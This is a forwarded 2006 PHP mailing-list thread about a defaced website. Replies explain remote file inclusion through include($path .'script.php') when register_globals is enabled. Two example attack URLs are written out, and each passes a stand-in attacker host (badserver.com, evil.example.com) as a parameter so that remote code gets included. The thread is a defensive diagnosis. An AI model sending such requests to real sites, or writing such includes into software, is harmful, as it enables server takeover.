---------- Forwarded message ---------- From: Rory Browne <[EMAIL PROTECTED]> Date: Nov 13, 2006 7:12 PM Subject: Re: [PHP] Highjack? To: [EMAIL PROTECTED]
On 11/13/06, bruce <[EMAIL PROTECTED]> wrote:
eric... you say how embarrasing regaring the $path.'foo'.... i'm curious, why/how is this simple piece of code exploitable. assuming $path is not something that comes via the url vars (GET/POST/REQUEST)
If register_globals is enabled, someone could http://www.example.com/badscript.php?path=http://www.badserver.com/badscript.txt?dummy= The script will then include http://www.badserver.com/badscript.txt?dummy=script.php it shouldn't be able to be touched
by external/client processes... similarly, the 'foo' would be static, and couldn't be munged... thoughts/explanations... thanks -----Original Message----- From: Eric Butera [mailto:[EMAIL PROTECTED] Sent: Monday, November 13, 2006 9:39 AM To: tedd Cc: PHP General List Subject: Re: [PHP] Highjack? On 11/13/06, tedd <[EMAIL PROTECTED]> wrote: > Hi gang: > > While this is not an obvious php question, it does deal with security > which is a concern. > > Just this morning had a couple of my sites "highjacked". What I found > was someone had replaced my root level index.php with their own > index.php. You can see the result at: > > http://xn--u2g.com/index1.php > > It was not a terrible loss nor inconvenience, but I wonder how they > did it. Any ideas how this was done and suggestions as to how to > prevent this from happening again? > > Thanks, > > tedd > > -- > ------- > http://sperling.com http://ancientstones.com http://earthstones.com > > -- > PHP General Mailing List (http://www.php.net/) > To unsubscribe, visit: http://www.php.net/unsub.php > > Tedd, I've seen this happen before when someone was able to do a remote code execution exploit on an old version of a very popular open source shopping cart project. I'd say the first thing would be to try and find any include/require statements that are exploitable. In the case I was dealing with, it was a problem with register_globals on and an include that looked a bit like this include($path .'script.php');. How embarrassing. If you have access to your server logs look for urls such as http://example.com/exploited.php?action=http://evil.example.com/inject.txt . -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
